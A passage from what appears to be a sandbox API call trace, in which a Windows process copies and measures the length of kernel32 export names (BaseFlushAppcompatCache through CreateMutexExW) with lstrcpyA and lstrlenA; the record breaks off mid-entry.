[0087.269] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0087.269] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0087.269] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0087.269] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0087.269] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0087.269] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0087.269] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0087.269] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0087.269] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0087.269] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0087.270] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0087.270] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0087.270] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0087.270] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0087.270] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0087.270] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0087.270] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0087.270] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0087.270] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0087.270] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0087.270] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0087.270] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0087.270] lstrlenA (lpString="BEEP") returned 4 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0087.270] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0087.270] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0087.270] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0087.270] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0087.270] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0087.270] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0087.270] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0087.271] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0087.271] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0087.271] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0087.271] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0087.271] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0087.271] lstrlenA (lpString="CANCELIO") returned 8 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0087.271] lstrlenA (lpString="CANCELIOEX") returned 10 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.271] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.271] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.271] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.271] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.271] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.271] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.271] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.271] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.271] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.271] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.271] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.271] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.271] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.272] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.272] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.272] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.272] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.272] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.272] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.272] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.272] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.272] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.272] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.272] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.272] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.272] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.272] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.272] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.272] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.272] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.272] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.272] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.272] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.273] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.273] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.273] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.273] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.273] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.273] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.273] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.273] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.273] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.273] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.273] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.273] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.273] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.273] lstrlenA (lpString="COPYFILEA") returned 9 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.273] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.273] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.273] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.273] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.273] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.274] lstrlenA (lpString="COPYFILEW") returned 9 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.274] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.274] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.274] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.274] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.274] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.274] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.274] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.274] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.274] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.274] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.274] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.274] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.274] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.274] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.274] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.274] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.274] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.274] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.274] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.275] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.275] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.275] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.275] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.275] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.275] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.275] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.275] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.275] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.275] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.275] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.275] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.275] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.275] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.275] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.275] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.275] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.275] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.275] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.275] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.276] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.276] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.276] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.276] lstrcpyA (in: lpString1=0x3f2d1ec, 